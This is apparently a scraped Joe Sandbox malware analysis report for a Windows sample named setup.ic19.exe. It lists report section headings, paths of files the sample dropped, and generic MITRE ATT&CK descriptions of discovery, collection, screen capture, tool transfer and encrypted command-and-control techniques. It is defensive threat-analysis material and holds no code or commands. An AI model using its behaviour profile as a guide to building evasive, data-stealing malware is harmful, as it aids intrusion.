
Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\eL62Gl4\80c2T80R.exe

C:\Program Files (x86)\eL62Gl4\log.src

C:\Program Files (x86)\eL62Gl4\tbcore3U.dll

C:\Program Files (x86)\eL62Gl4\utils.vcxproj

C:\Program Files (x86)\lXAMaI\lXAMaI.exe

C:\Program Files (x86)\lXAMaI\log.src

C:\Program Files (x86)\lXAMaI\tbcore3U.dll

C:\Program Files (x86)\lXAMaI\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
setup.ic19.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre